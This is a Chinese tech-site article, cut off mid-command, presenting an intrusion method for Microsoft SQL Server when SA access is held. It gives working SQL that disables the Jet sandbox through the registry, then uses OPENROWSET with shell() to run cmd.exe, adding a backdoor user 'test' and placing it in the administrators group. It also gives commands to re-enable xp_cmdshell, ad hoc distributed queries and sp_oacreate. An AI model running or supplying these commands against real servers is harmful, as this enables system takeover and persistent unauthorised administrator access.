- ·上一篇文章:定制Windows 2008使它适合日常使用
- ·下一篇文章:你所不知道的Windows7企业功能详解
Microsoft SQL Server SA权限最新入侵方法
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Engines','SandBoxMode','REG_DWORD',1
然后执行沙盘命令,在系统添加一个用户名为test,密码为1234的用户:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup
administrators test /add")')
不同的操作系统,路径也不一样,需要根据情况做修改:
NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
另外Microsoft SQL Server2005在默认情况下,一些存储过程是关闭着的,需要命令打开:
开启XP_cmdshell:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure
'xp_cmdshell', 1;RECONFIGURE;
开启'OPENROWSET':
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ad Hoc Distributed Queries',1;RECONFIGURE;
开启'sp_oacreate':
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp
Tags:
相关资讯
- › Microsoft Launcher 5.0正式版发布!引入全新Feed页
- › 映泰发布全新micro-ATX主板:支持8代酷睿及2666MHz D
- › 经典收藏!Microsoft office2007完整专业版(内附序
- › 微软发布iOS/安卓版一款登录验证应用Microsoft Auth
- › 微软首款iOS相机应用Microsoft Pix发布:超越原生相
- › 95MB/s!三星推首款EVO Plus 256GB MicroSD储存卡
- › 闪迪推出128GB microSDXC存储卡:通过GoPro认证
- › 微软发布最强免费录屏工具Microsoft Snip
- › 教你更改Microsoft Edge浏览器的默认下载位置
- › 堪比SSD!全球首款512GB Micro SD卡发布